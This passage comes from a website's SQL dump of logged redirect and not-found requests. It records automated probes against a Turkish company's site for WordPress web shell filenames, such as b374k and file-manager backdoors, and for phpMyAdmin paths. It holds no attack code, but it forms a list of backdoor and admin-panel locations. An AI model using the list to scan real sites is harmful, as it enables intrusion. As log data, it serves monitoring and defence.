00:00:00',301),(34613,'http://3s-technologies.com.tr/tr/wp-includes/plugins/instabuilder2/cache/plugins/moon.php',NULL,'http://3s-technologies.com.tr/wp-includes/plugins/instabuilder2/cache/plugins/moon.php','',1,0,'2024-05-17 12:40:04','0000-00-00 00:00:00',301),(34614,'http://3s-technologies.com.tr/tr/wp-content/index1.php',NULL,'http://3s-technologies.com.tr/wp-content/index1.php','',1,0,'2024-05-17 12:40:05','0000-00-00 00:00:00',301),(34615,'http://3s-technologies.com.tr/tr/wp-includes/content.php',NULL,'http://3s-technologies.com.tr/wp-includes/content.php','',7,0,'2024-05-17 12:40:06','0000-00-00 00:00:00',301),(34616,'http://3s-technologies.com.tr/tr/epinyins.php',NULL,'http://3s-technologies.com.tr/epinyins.php','',123,0,'2024-05-17 12:40:11','0000-00-00 00:00:00',301),(34617,'http://3s-technologies.com.tr/tr/wp-content/plugins/linkpreview/mar.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/linkpreview/mar.php','',1,0,'2024-05-17 12:40:14','0000-00-00 00:00:00',301),(34618,'http://3s-technologies.com.tr/tr/pekok.php',NULL,'http://3s-technologies.com.tr/pekok.php','',7,0,'2024-05-17 12:40:19','0000-00-00 00:00:00',301),(34619,'http://3s-technologies.com.tr/tr/.well-known/js.php',NULL,'http://3s-technologies.com.tr/.well-known/js.php','',2,0,'2024-05-17 12:40:26','0000-00-00 00:00:00',301),(34620,'http://3s-technologies.com.tr/tr/dropdown.php/wp-admin/images/mhbgf.php',NULL,'http://3s-technologies.com.tr/dropdown.php/wp-admin/images/Mhbgf.php','',1,0,'2024-05-17 12:40:28','0000-00-00 00:00:00',301),(34621,'http://3s-technologies.com.tr/tr/wp-content/uploads/help.php',NULL,'http://3s-technologies.com.tr/wp-content/uploads/help.php','',1,0,'2024-05-17 12:40:28','0000-00-00 00:00:00',301),(34622,'http://3s-technologies.com.tr/tr/rc.php',NULL,'http://3s-technologies.com.tr/rc.php','',1,0,'2024-05-17 12:40:30','0000-00-00 00:00:00',301),(34623,'http://3s-technologies.com.tr/tr/wp-apxupx.php?apx=upx',NULL,'http://3s-technologies.com.tr/wp-apxupx.php?apx=upx','',1,0,'2024-05-17 12:40:31','0000-00-00 00:00:00',301),(34624,'http://3s-technologies.com.tr/tr/.well-known/acme-challenge/index.php',NULL,'http://3s-technologies.com.tr/.well-known/acme-challenge/index.php','',215,0,'2024-05-17 12:40:32','0000-00-00 00:00:00',301),(34625,'http://3s-technologies.com.tr/tr/.well-known/index.php',NULL,'http://3s-technologies.com.tr/.well-known/index.php','',224,0,'2024-05-17 12:40:33','0000-00-00 00:00:00',301),(34626,'http://3s-technologies.com.tr/tr/images/include.php',NULL,'http://3s-technologies.com.tr/images/include.php','',1,0,'2024-05-17 12:40:35','0000-00-00 00:00:00',301),(34627,'http://3s-technologies.com.tr/tr/images/class.engine.php',NULL,'http://3s-technologies.com.tr/images/class.engine.php','',1,0,'2024-05-17 12:40:35','0000-00-00 00:00:00',301),(34628,'http://3s-technologies.com.tr/tr/js/be.php',NULL,'http://3s-technologies.com.tr/js/be.php','',1,0,'2024-05-17 12:40:36','0000-00-00 00:00:00',301),(34629,'http://3s-technologies.com.tr/tr/makeasmtp.php',NULL,'http://3s-technologies.com.tr/makeasmtp.php','',391,0,'2024-05-17 12:40:37','0000-00-00 00:00:00',301),(34630,'http://3s-technologies.com.tr/tr/bak.php',NULL,'http://3s-technologies.com.tr/bak.php','',174,0,'2024-05-17 12:40:38','0000-00-00 00:00:00',301),(34631,'http://3s-technologies.com.tr/tr/wp-includes/ms-controller.php',NULL,'http://3s-technologies.com.tr/wp-includes/ms-controller.php','',1,0,'2024-05-17 12:40:39','0000-00-00 00:00:00',301),(34632,'http://3s-technologies.com.tr/tr/wp-includes/class-wp-smtp-bar.php',NULL,'http://3s-technologies.com.tr/wp-includes/class-wp-smtp-bar.php','',1,0,'2024-05-17 12:40:40','0000-00-00 00:00:00',301),(34633,'http://3s-technologies.com.tr/tr/wp-atom.php',NULL,'http://3s-technologies.com.tr/wp-atom.php','',32,0,'2024-05-17 12:40:40','0000-00-00 00:00:00',301),(34634,'http://3s-technologies.com.tr/tr/wp-includes/js/themes.php',NULL,'http://3s-technologies.com.tr/wp-includes/js/themes.php','',1,0,'2024-05-17 12:40:41','0000-00-00 00:00:00',301),(34635,'http://3s-technologies.com.tr/tr/wp-content/plugins/root-file-manager/wp-file.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/root-file-manager/wp-file.php','',5,0,'2024-05-17 12:40:42','0000-00-00 00:00:00',301),(34636,'http://3s-technologies.com.tr/tr/wp-content/plugins/dummyyummy/wp-signup.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/dummyyummy/wp-signup.php','',156,0,'2024-05-17 12:40:42','0000-00-00 00:00:00',301),(34637,'http://3s-technologies.com.tr/tr/images/offline.php',NULL,'http://3s-technologies.com.tr/images/offline.php','',1,0,'2024-05-17 12:40:43','0000-00-00 00:00:00',301),(34638,'http://3s-technologies.com.tr/tr/wp-content/plugins/ph-file-manager/wp-file.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/ph-file-manager/wp-file.php','',5,0,'2024-05-17 12:40:44','0000-00-00 00:00:00',301),(34639,'http://3s-technologies.com.tr/tr/wp-includes/item.php',NULL,'http://3s-technologies.com.tr/wp-includes/item.php','',22,0,'2024-05-17 12:40:44','0000-00-00 00:00:00',301),(34640,'http://3s-technologies.com.tr/tr/wp-includes/class-response.php',NULL,'http://3s-technologies.com.tr/wp-includes/class-response.php','',1,0,'2024-05-17 12:40:45','0000-00-00 00:00:00',301),(34641,'http://3s-technologies.com.tr/tr/.wp-cli/fkgqobim.php',NULL,'http://3s-technologies.com.tr/.wp-cli/fkgqobim.php','',1,0,'2024-05-17 12:40:46','0000-00-00 00:00:00',301),(34642,'http://3s-technologies.com.tr/tr/css/load.php',NULL,'http://3s-technologies.com.tr/css/load.php','',2,0,'2024-05-17 12:40:47','0000-00-00 00:00:00',301),(34643,'http://3s-technologies.com.tr/tr/images/rmdir.php',NULL,'http://3s-technologies.com.tr/images/rmdir.php','',1,0,'2024-05-17 12:40:47','0000-00-00 00:00:00',301),(34644,'http://3s-technologies.com.tr/tr/wp-content/upgrade/wp-casper.php',NULL,'http://3s-technologies.com.tr/wp-content/upgrade/wp-casper.php','',1,0,'2024-05-17 12:40:48','0000-00-00 00:00:00',301),(34645,'http://3s-technologies.com.tr/tr/images/uclnvbmt.php',NULL,'http://3s-technologies.com.tr/images/uclnvbmt.php','',1,0,'2024-05-17 12:40:49','0000-00-00 00:00:00',301),(34646,'http://3s-technologies.com.tr/tr/uploads/b374k.php.suspected',NULL,'http://3s-technologies.com.tr/uploads/b374k.php.suspected','',1,0,'2024-05-17 12:40:50','0000-00-00 00:00:00',301),(34647,'http://3s-technologies.com.tr/tr/wp-includes/js/tinymce/wp-login.php',NULL,'http://3s-technologies.com.tr/wp-includes/js/tinymce/wp-login.php','',1,0,'2024-05-17 12:40:52','0000-00-00 00:00:00',301),(34648,'http://3s-technologies.com.tr/tr/wp-includes/tool.php',NULL,'http://3s-technologies.com.tr/wp-includes/tool.php','',1,0,'2024-05-17 12:40:52','0000-00-00 00:00:00',301),(34649,'http://3s-technologies.com.tr/tr/wp-content/alfamodif.php',NULL,'http://3s-technologies.com.tr/wp-content/alfamodif.php','',1,0,'2024-05-17 12:40:53','0000-00-00 00:00:00',301),(34650,'http://3s-technologies.com.tr/tr/wp-includes/wp-cogguk.php',NULL,'http://3s-technologies.com.tr/wp-includes/wp-cogguk.php','',1,0,'2024-05-17 12:40:54','0000-00-00 00:00:00',301),(34651,'http://3s-technologies.com.tr/tr/wp-includes/feed-atom-comments-meta.php',NULL,'http://3s-technologies.com.tr/wp-includes/feed-atom-comments-meta.php','',1,0,'2024-05-17 12:40:54','0000-00-00 00:00:00',301),(34652,'http://3s-technologies.com.tr/tr/wp-content/languages/confno7.php',NULL,'http://3s-technologies.com.tr/wp-content/languages/confno7.php','',1,0,'2024-05-17 12:40:55','0000-00-00 00:00:00',301),(34653,'http://3s-technologies.com.tr/tr/wp-includes/id3/getid3s.php',NULL,'http://3s-technologies.com.tr/wp-includes/ID3/getid3s.php','',2,0,'2024-05-17 12:40:56','0000-00-00 00:00:00',301),(34654,'http://3s-technologies.com.tr/tr/uploads/20230303064717.php',NULL,'http://3s-technologies.com.tr/uploads/20230303064717.php','',1,0,'2024-05-17 12:40:56','0000-00-00 00:00:00',301),(34655,'http://3s-technologies.com.tr/tr/wp-includes/js/tinymce/radio.php',NULL,'http://3s-technologies.com.tr/wp-includes/js/tinymce/radio.php','',1,0,'2024-05-17 12:40:57','0000-00-00 00:00:00',301),(34656,'http://3s-technologies.com.tr/tr/assets/dropdown.php',NULL,'http://3s-technologies.com.tr/assets/dropdown.php','',1,0,'2024-05-17 12:40:57','0000-00-00 00:00:00',301),(34657,'http://3s-technologies.com.tr/tr/wp-includes/class-wp-session-tokens-ajax.php',NULL,'http://3s-technologies.com.tr/wp-includes/class-wp-session-tokens-ajax.php','',1,0,'2024-05-17 12:40:58','0000-00-00 00:00:00',301),(34658,'http://3s-technologies.com.tr/tr/wp-content/index.php.suspected',NULL,'http://3s-technologies.com.tr/wp-content/index.php.suspected','',2,0,'2024-05-17 12:40:59','0000-00-00 00:00:00',301),(34659,'http://3s-technologies.com.tr/tr/wp-includes/js/tinymce/wp-conflg.php.suspected',NULL,'http://3s-technologies.com.tr/wp-includes/js/tinymce/wp-conflg.php.suspected','',1,0,'2024-05-17 12:41:00','0000-00-00 00:00:00',301),(34660,'http://3s-technologies.com.tr/tr/wp-content/themes/travel/issue.php',NULL,'http://3s-technologies.com.tr/wp-content/themes/travel/issue.php','',21,0,'2024-05-17 12:41:01','0000-00-00 00:00:00',301),(34661,'http://3s-technologies.com.tr/tr/css/wp-blog.php',NULL,'http://3s-technologies.com.tr/css/wp-blog.php','',1,0,'2024-05-17 12:41:02','0000-00-00 00:00:00',301),(34662,'http://3s-technologies.com.tr/tr/wp-admin/tnbjcwqrqu.php.suspected',NULL,'http://3s-technologies.com.tr/wp-admin/tnbjcwqrqu.php.suspected','',1,0,'2024-05-17 12:41:03','0000-00-00 00:00:00',301),(34663,'http://3s-technologies.com.tr/tr/upfile.php',NULL,'http://3s-technologies.com.tr/upfile.php','',67,0,'2024-05-17 12:41:04','0000-00-00 00:00:00',301),(34664,'http://3s-technologies.com.tr/tr/wp-content/plugins/pwnd/pwnd.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/pwnd/pwnd.php','',70,0,'2024-05-17 12:41:04','0000-00-00 00:00:00',301),(34665,'http://3s-technologies.com.tr/tr/wp-includes/js/irrrndex.php',NULL,'http://3s-technologies.com.tr/wp-includes/js/irrrndex.php','',1,0,'2024-05-17 12:41:05','0000-00-00 00:00:00',301),(34666,'http://3s-technologies.com.tr/tr/wp-includes/js/tinymce/plugins/compat3x/css/wp-casper.php',NULL,'http://3s-technologies.com.tr/wp-includes/js/tinymce/plugins/compat3x/css/wp-casper.php','',1,0,'2024-05-17 12:41:06','0000-00-00 00:00:00',301),(34667,'http://3s-technologies.com.tr/tr/css/default.php',NULL,'http://3s-technologies.com.tr/css/default.php','',5,0,'2024-05-17 12:41:29','0000-00-00 00:00:00',301),(34668,'http://3s-technologies.com.tr/tr/wp-includes/class-wp-editor-cron.php',NULL,'http://3s-technologies.com.tr/wp-includes/class-wp-editor-cron.php','',1,0,'2024-05-17 12:41:31','0000-00-00 00:00:00',301),(34669,'http://3s-technologies.com.tr/tr/wp-includes/rest-api/class-wp-rest-report.php',NULL,'http://3s-technologies.com.tr/wp-includes/rest-api/class-wp-rest-report.php','',1,0,'2024-05-17 12:41:32','0000-00-00 00:00:00',301),(34670,'http://3s-technologies.com.tr/tr/wp-includes/feed-rdp.php',NULL,'http://3s-technologies.com.tr/wp-includes/feed-rdp.php','',1,0,'2024-05-17 12:41:32','0000-00-00 00:00:00',301),(34671,'http://3s-technologies.com.tr/tr/wp-content/635fe85472db4.php',NULL,'http://3s-technologies.com.tr/wp-content/635fe85472db4.php','',1,0,'2024-05-17 12:41:33','0000-00-00 00:00:00',301),(34672,'http://3s-technologies.com.tr/tr/css/radio.php',NULL,'http://3s-technologies.com.tr/css/radio.php','',6,0,'2024-05-17 12:41:34','0000-00-00 00:00:00',301),(34673,'http://3s-technologies.com.tr/tr/js/file.php',NULL,'http://3s-technologies.com.tr/js/file.php','',1,0,'2024-05-17 12:41:36','0000-00-00 00:00:00',301),(34674,'http://3s-technologies.com.tr/tr/assets/library.php',NULL,'http://3s-technologies.com.tr/assets/library.php','',9,0,'2024-05-17 12:41:37','0000-00-00 00:00:00',301),(34675,'http://3s-technologies.com.tr/tr/wp-includes/fm.php',NULL,'http://3s-technologies.com.tr/wp-includes/fm.php','',1,0,'2024-05-17 12:41:38','0000-00-00 00:00:00',301),(34676,'http://3s-technologies.com.tr/tr/wp-content/uploads/slider/cache/2464190f3a01107fe76f4b38d8bdd084/wp-blog.php',NULL,'http://3s-technologies.com.tr/wp-content/uploads/slider/cache/2464190f3a01107fe76f4b38d8bdd084/wp-blog.php','',1,0,'2024-05-17 12:41:38','0000-00-00 00:00:00',301),(34677,'http://3s-technologies.com.tr/tr/wp-content/cache/object/04e/452/wp-blog.php',NULL,'http://3s-technologies.com.tr/wp-content/cache/object/04e/452/wp-blog.php','',1,0,'2024-05-17 12:41:39','0000-00-00 00:00:00',301),(34678,'http://3s-technologies.com.tr/tr/wp-content/cache/object/58d/210/wp-blog.php',NULL,'http://3s-technologies.com.tr/wp-content/cache/object/58d/210/wp-blog.php','',1,0,'2024-05-17 12:41:40','0000-00-00 00:00:00',301),(34679,'http://3s-technologies.com.tr/tr/wp-content/cache/wp-rocket/zankuloaded.com.ng/lil-baby-in-a-minute/wp-blog.php',NULL,'http://3s-technologies.com.tr/wp-content/cache/wp-rocket/zankuloaded.com.ng/lil-baby-in-a-minute/wp-blog.php','',1,0,'2024-05-17 12:41:40','0000-00-00 00:00:00',301),(34680,'http://3s-technologies.com.tr/tr/wp-content/cache/wpfc-minified/dr7ki7f9/wp-blog.php',NULL,'http://3s-technologies.com.tr/wp-content/cache/wpfc-minified/dr7ki7f9/wp-blog.php','',1,0,'2024-05-17 12:41:41','0000-00-00 00:00:00',301),(34681,'http://3s-technologies.com.tr/tr/wp-content/newfold-page-cache/pbaah21021747882084p/wp-blog.php',NULL,'http://3s-technologies.com.tr/wp-content/newfold-page-cache/pbaah21021747882084p/wp-blog.php','',1,0,'2024-05-17 12:41:42','0000-00-00 00:00:00',301),(34682,'http://3s-technologies.com.tr/tr/wp-content/plugins/litespeed-cache/wp-blog.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/litespeed-cache/wp-blog.php','',1,0,'2024-05-17 12:41:42','0000-00-00 00:00:00',301),(34683,'http://3s-technologies.com.tr/tr/cache/plugins.php',NULL,'http://3s-technologies.com.tr/cache/plugins.php','',1,0,'2024-05-17 12:41:43','0000-00-00 00:00:00',301),(34684,'http://3s-technologies.com.tr/tr/bitrix/cache/network.php',NULL,'http://3s-technologies.com.tr/bitrix/cache/network.php','',1,0,'2024-05-17 12:41:44','0000-00-00 00:00:00',301),(34685,'http://3s-technologies.com.tr/tr/db5yjt/cache/wp-login.php',NULL,'http://3s-technologies.com.tr/db5yjt/cache/wp-login.php','',1,0,'2024-05-17 12:41:44','0000-00-00 00:00:00',301),(34686,'http://3s-technologies.com.tr/tr/wp-content/plugins/litespeed-cache/tpl/dash/wp-blog.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/litespeed-cache/tpl/dash/wp-blog.php','',1,0,'2024-05-17 12:41:45','0000-00-00 00:00:00',301),(34687,'http://3s-technologies.com.tr/tr/wp-content/cache/themes.php',NULL,'http://3s-technologies.com.tr/wp-content/cache/themes.php','',1,0,'2024-05-17 12:41:46','0000-00-00 00:00:00',301),(34688,'http://3s-technologies.com.tr/tr/general/cache/plugins.php',NULL,'http://3s-technologies.com.tr/general/cache/plugins.php','',2,0,'2024-05-17 12:41:46','0000-00-00 00:00:00',301),(34689,'http://3s-technologies.com.tr/tr/sozorp/cache/about.php',NULL,'http://3s-technologies.com.tr/sozorp/cache/about.php','',1,0,'2024-05-17 12:41:47','0000-00-00 00:00:00',301),(34690,'http://3s-technologies.com.tr/tr/wp-content/cache/ezcache/mhm.ltd/c21bb8dbd9613bf3f4467ba03b63b1e1/wp-blog.php',NULL,'http://3s-technologies.com.tr/wp-content/cache/ezcache/mhm.ltd/c21bb8dbd9613bf3f4467ba03b63b1e1/wp-blog.php','',1,0,'2024-05-17 12:41:48','0000-00-00 00:00:00',301),(34691,'http://3s-technologies.com.tr/tr/wp-content/et-cache/28891/wp-blog.php',NULL,'http://3s-technologies.com.tr/wp-content/et-cache/28891/wp-blog.php','',1,0,'2024-05-17 12:41:48','0000-00-00 00:00:00',301),(34692,'http://3s-technologies.com.tr/tr/wp-content/uploads/bb-plugin/cache/wp-blog.php',NULL,'http://3s-technologies.com.tr/wp-content/uploads/bb-plugin/cache/wp-blog.php','',1,0,'2024-05-17 12:41:49','0000-00-00 00:00:00',301),(34693,'http://3s-technologies.com.tr/tr/wp-content/cache/object/a1a/wp-blog.php',NULL,'http://3s-technologies.com.tr/wp-content/cache/object/a1a/wp-blog.php','',1,0,'2024-05-17 12:41:50','0000-00-00 00:00:00',301),(34694,'http://3s-technologies.com.tr/tr/wp/wp-content/plugins/incache/pwnkit/wp-blog.php',NULL,'http://3s-technologies.com.tr/wp/wp-content/plugins/incache/pwnkit/wp-blog.php','',1,0,'2024-05-17 12:41:50','0000-00-00 00:00:00',301),(34695,'http://3s-technologies.com.tr/tr/schwitz-biotech-pro1/wp-content/plugins/wp-super-cache/js/wp-blog.php',NULL,'http://3s-technologies.com.tr/schwitz-biotech-pro1/wp-content/plugins/wp-super-cache/js/wp-blog.php','',1,0,'2024-05-17 12:41:51','0000-00-00 00:00:00',301),(34696,'http://3s-technologies.com.tr/tr/ar/wp-content/plugins/litespeed-cache/thirdparty/wp-blog.php',NULL,'http://3s-technologies.com.tr/ar/wp-content/plugins/litespeed-cache/thirdparty/wp-blog.php','',1,0,'2024-05-17 12:41:52','0000-00-00 00:00:00',301),(34697,'http://3s-technologies.com.tr/tr/wp-content/endurance-page-cache/site/wp-includes/wp-blog.php',NULL,'http://3s-technologies.com.tr/wp-content/endurance-page-cache/site/wp-includes/wp-blog.php','',1,0,'2024-05-17 12:41:52','0000-00-00 00:00:00',301),(34698,'http://3s-technologies.com.tr/tr/novo/wp-content/cache/wpsol-cache/29aa9b5c4210339c30ab447650fb224b/wp-blog.php',NULL,'http://3s-technologies.com.tr/novo/wp-content/cache/wpsol-cache/29aa9b5c4210339c30ab447650fb224b/wp-blog.php','',1,0,'2024-05-17 12:41:53','0000-00-00 00:00:00',301),(34699,'http://3s-technologies.com.tr/tr/cache/d/e/h/c/wp-blog.php',NULL,'http://3s-technologies.com.tr/cache/d/e/h/c/wp-blog.php','',1,0,'2024-05-17 12:41:54','0000-00-00 00:00:00',301),(34700,'http://3s-technologies.com.tr/tr/wp-content/plugins/w3-total-cache/inc/wp-blog.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/w3-total-cache/inc/wp-blog.php','',1,0,'2024-05-17 12:41:55','0000-00-00 00:00:00',301),(34701,'http://3s-technologies.com.tr/tr/cache/h/a/c/f/wp-blog.php',NULL,'http://3s-technologies.com.tr/cache/h/a/c/f/wp-blog.php','',1,0,'2024-05-17 12:41:55','0000-00-00 00:00:00',301),(34702,'http://3s-technologies.com.tr/tr/wp-content/plugins/w3-total-cache/inc/lightbox/wp-blog.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/w3-total-cache/inc/lightbox/wp-blog.php','',1,0,'2024-05-17 12:41:56','0000-00-00 00:00:00',301),(34703,'http://3s-technologies.com.tr/tr/wp-content/et-cache/3011/wp-blog.php',NULL,'http://3s-technologies.com.tr/wp-content/et-cache/3011/wp-blog.php','',1,0,'2024-05-17 12:41:57','0000-00-00 00:00:00',301),(34704,'http://3s-technologies.com.tr/tr/wp-content/endurance-page-cache/nonhero-1595673-nthtofvw/wp-blog.php',NULL,'http://3s-technologies.com.tr/wp-content/endurance-page-cache/nonhero-1595673-NThTOFVw/wp-blog.php','',1,0,'2024-05-17 12:41:58','0000-00-00 00:00:00',301),(34705,'http://3s-technologies.com.tr/tr/layout/et-cache/1412/wp-blog.php',NULL,'http://3s-technologies.com.tr/layout/et-cache/1412/wp-blog.php','',1,0,'2024-05-17 12:41:58','0000-00-00 00:00:00',301),(34706,'http://3s-technologies.com.tr/tr/wp-content/cache/wp-rocket/ignitemarketingx.com/about/wp-blog.php',NULL,'http://3s-technologies.com.tr/wp-content/cache/wp-rocket/ignitemarketingx.com/about/wp-blog.php','',1,0,'2024-05-17 12:41:59','0000-00-00 00:00:00',301),(34707,'http://3s-technologies.com.tr/tr/smtp.inbox-mailer150.arsinzenjering.com/cache/h/d/d/wp-blog.php',NULL,'http://3s-technologies.com.tr/smtp.inbox-mailer150.arsinzenjering.com/cache/h/d/d/wp-blog.php','',1,0,'2024-05-17 12:42:00','0000-00-00 00:00:00',301),(34708,'http://3s-technologies.com.tr/tr/wp-content/endurance-page-cache/y/a412548/wp-blog.php',NULL,'http://3s-technologies.com.tr/wp-content/endurance-page-cache/y/A412548/wp-blog.php','',1,0,'2024-05-17 12:42:01','0000-00-00 00:00:00',301),(34709,'http://3s-technologies.com.tr/tr/wp-includes/images/wlw/admin.php',NULL,'http://3s-technologies.com.tr/wp-includes/images/wlw/admin.php','',2,0,'2024-05-17 12:42:01','0000-00-00 00:00:00',301),(34710,'http://3s-technologies.com.tr/tr/wp-includes/dir/wp-login.php',NULL,'http://3s-technologies.com.tr/wp-includes/dir/wp-login.php','',1,0,'2024-05-17 12:42:02','0000-00-00 00:00:00',301),(34711,'http://3s-technologies.com.tr/tr/wp-scr1pts.php',NULL,'http://3s-technologies.com.tr/wp-scr1pts.php','',6,0,'2024-05-17 12:42:03','0000-00-00 00:00:00',301),(34712,'http://3s-technologies.com.tr/tr/wp-content/uploads/2021/09/lock.php',NULL,'http://3s-technologies.com.tr/wp-content/uploads/2021/09/lock.php','',1,0,'2024-05-17 12:42:04','0000-00-00 00:00:00',301),(34713,'http://3s-technologies.com.tr/tr/wp-includes/js/crop/wp-admin.php',NULL,'http://3s-technologies.com.tr/wp-includes/js/crop/wp-admin.php','',1,0,'2024-05-17 12:42:05','0000-00-00 00:00:00',301),(34714,'http://3s-technologies.com.tr/tr/wp-the1me.php',NULL,'http://3s-technologies.com.tr/wp-the1me.php','',5,0,'2024-05-17 12:42:05','0000-00-00 00:00:00',301),(34715,'http://3s-technologies.com.tr/tr/images/bannerads/1578087141_v3.php',NULL,'http://3s-technologies.com.tr/images/bannerads/1578087141_v3.php','',2,0,'2024-05-17 12:42:06','0000-00-00 00:00:00',301),(34716,'http://3s-technologies.com.tr/tr/wp-includes/fonts/wp-login.php',NULL,'http://3s-technologies.com.tr/wp-includes/fonts/wp-login.php','',46,0,'2024-05-17 12:42:07','0000-00-00 00:00:00',301),(34717,'http://3s-technologies.com.tr/tr/wp-includes/js/jcrop/jcrop.php',NULL,'http://3s-technologies.com.tr/wp-includes/js/jcrop/Jcrop.php','',88,0,'2024-05-17 12:42:08','0000-00-00 00:00:00',301),(34718,'http://3s-technologies.com.tr/tr/wp-includes/phpmailer/plugins.php',NULL,'http://3s-technologies.com.tr/wp-includes/PHPMailer/plugins.php','',1,0,'2024-05-17 12:42:08','0000-00-00 00:00:00',301),(34719,'http://3s-technologies.com.tr/tr/.well-known/acme-challenge/settings.php',NULL,'http://3s-technologies.com.tr/.well-known/acme-challenge/settings.php','',1,0,'2024-05-17 12:42:09','0000-00-00 00:00:00',301),(34720,'http://3s-technologies.com.tr/tr/wp-includes/customize/aogbgreen.php',NULL,'http://3s-technologies.com.tr/wp-includes/customize/aogbgreen.php','',1,0,'2024-05-17 12:42:10','0000-00-00 00:00:00',301),(34721,'http://3s-technologies.com.tr/tr/uploads/261ec7de16d95c9b9ca5399f8076736b.php',NULL,'http://3s-technologies.com.tr/uploads/261ec7de16d95c9b9ca5399f8076736b.php','',1,0,'2024-05-17 12:42:11','0000-00-00 00:00:00',301),(34722,'https://3s-technologies.com.tr/db/phpmyadmin3/index.php?lang=en',NULL,'','',8,0,'2024-05-18 04:23:48','0000-00-00 00:00:00',301),(34723,'https://3s-technologies.com.tr/mysql/mysqlmanager/index.php?lang=en',NULL,'','',4,0,'2024-05-18 04:23:48','0000-00-00 00:00:00',301),(34724,'https://3s-technologies.com.tr/db/phpmyadmin4/index.php?lang=en',NULL,'','',4,0,'2024-05-18 04:23:49','0000-00-00 00:00:00',301),(34725,'https://3s-technologies.com.tr/phpmyadmin/index.php?lang=en',NULL,'','',16,0,'2024-05-18 04:23:50','0000-00-00 00:00:00',301),(34726,'https://3s-technologies.com.tr/dbadmin/index.php?lang=en',NULL,'','',4,0,'2024-05-18 04:23:51','0000-00-00 00:00:00',301),(34727,'https://3s-technologies.com.tr/phpmyadmin-5.1.0/index.php?lang=en',NULL,'','',3,0,'2024-05-18 04:23:51','0000-00-00 00:00:00',301),(34728,'https://3s-technologies.com.tr/phpmyadmin-latest-english/index.php?lang=en',NULL,'','',3,0,'2024-05-18 04:23:52','0000-00-00 00:00:00',301),(34729,'https://3s-technologies.com.tr/db/myadmin/index.php?lang=en',NULL,'','',4,0,'2024-05-18 04:23:52','0000-00-00 00:00:00',301),(34730,'https://3s-technologies.com.tr/phpmyadmin-5.2.1/index.php?lang=en',NULL,'','',3,0,'2024-05-18 04:23:53','0000-00-00 00:00:00',301),(34731,'https://3s-technologies.com.tr/__phpmyadmin/index.php?lang=en',NULL,'','',4,0,'2024-05-18 04:23:54','0000-00-00 00:00:00',301),(34732,'https://3s-technologies.com.tr/phpmyadmin-5.1.1/index.php?lang=en',NULL,'','',4,0,'2024-05-18 04:23:55','0000-00-00 00:00:00',301),(34733,'https://3s-technologies.com.tr/wp-content/plugins/portable-phpmyadmin/wp-pma-mod/index.php?lang=en',NULL,'','',4,0,'2024-05-18 04:23:55','0000-00-00 00:00:00',301),(34734,'https://3s-technologies.com.tr/phpmyadmin2/index.php?lang=en',NULL,'','',8,0,'2024-05-18 04:23:56','0000-00-00 00:00:00',301),(34735,'https://3s-technologies.com.tr/sql/phpmyadmin4/index.php?lang=en',NULL,'','',3,0,'2024-05-18 04:23:57','0000-00-00 00:00:00',301),(34736,'https://3s-technologies.com.tr/phpmyadmin2022/index.php?lang=en',NULL,'','',3,0,'2024-05-18 04:23:57','0000-00-00 00:00:00',301),(34737,'https://3s-technologies.com.tr/phpmyadmin1/index.php?lang=en',NULL,'','',7,0,'2024-05-18 04:23:58','0000-00-00 00:00:00',301),(34738,'https://3s-technologies.com.tr/phpmyadmin_/index.php?lang=en',NULL,'','',8,0,'2024-05-18 04:23:59','0000-00-00 00:00:00',301),(34739,'https://3s-technologies.com.tr/db/webdb/index.php?lang=en',NULL,'','',4,0,'2024-05-18 04:23:59','0000-00-00 00:00:00',301),(34740,'https://3s-technologies.com.tr/sql/phpmy-admin/index.php?lang=en',NULL,'','',3,0,'2024-05-18 04:24:00','0000-00-00 00:00:00',301),(34741,'https://3s-technologies.com.tr/phpmyadmin5/index.php?lang=en',NULL,'','',8,0,'2024-05-18 04:24:01','0000-00-00 00:00:00',301),(34742,'https://3s-technologies.com.tr/_phpmyadmin_/index.php?lang=en',NULL,'','',4,0,'2024-05-18 04:24:01','0000-00-00 00:00:00',301),(34743,'https://3s-technologies.com.tr/phpmyadmin-5.1.3/index.php?lang=en',NULL,'','',4,0,'2024-05-18 04:24:02','0000-00-00 00:00:00',301),(34744,'https://3s-technologies.com.tr/administrator/pma/index.php?lang=en',NULL,'','',8,0,'2024-05-18 04:24:03','0000-00-00 00:00:00',301),(34745,'https://3s-technologies.com.tr/database/index.php?lang=en',NULL,'','',4,0,'2024-05-18 04:24:03','0000-00-00 00:00:00',301),(34746,'https://3s-technologies.com.tr/phpmyadmin2018/index.php?lang=en',NULL,'','',4,0,'2024-05-18 04:24:04','0000-00-00 00:00:00',301),(34747,'https://3s-technologies.com.tr/admin/sqladmin/index.php?lang=en',NULL,'','',4,0,'2024-05-18 04:24:04','0000-00-00 00:00:00',301),(34748,'https://3s-technologies.com.tr/sql/sqladmin/index.php?lang=en',NULL,'','',4,0,'2024-05-18 04:24:05','0000-00-00 00:00:00',301),(34749,'https://3s-technologies.com.tr/db/dbadmin/index.php?lang=en',NULL,'','',4,0,'2024-05-18 04:24:06','0000-00-00 00:00:00',301),(34750,'https://3s-technologies.com.tr/admin/db/index.php?lang=en',NULL,'','',4,0,'2024-05-18 04:24:07','0000-00-00 00:00:00',301),(34751,'https://3s-technologies.com.tr/db/db-admin/index.php?lang=en',NULL,'','',4,0,'2024-05-18 04:24:08','0000-00-00 00:00:00',301),(34752,'https://3s-technologies.com.tr/administrator/phpmyadmin/index.php?lang=en',NULL,'','',8,0,'2024-05-18 04:24:08','0000-00-00 00:00:00',301),(34753,'https://3s-technologies.com.tr/phpmyadmin3/index.php?lang=en',NULL,'','',8,0,'2024-05-18 04:24:10','0000-00-00 00:00:00',301),(34754,'https://3s-technologies.com.tr/admin/phpmyadmin/index.php?lang=en',NULL,'','',8,0,'2024-05-18 04:24:10','0000-00-00 00:00:00',301),(34755,'https://3s-technologies.com.tr/phpmyadmin5.1/index.php?lang=en',NULL,'','',3,0,'2024-05-18 04:24:11','0000-00-00 00:00:00',301),(34756,'https://3s-technologies.com.tr/myadmin/index.php?lang=en',NULL,'','',6,0,'2024-05-18 04:24:12','0000-00-00 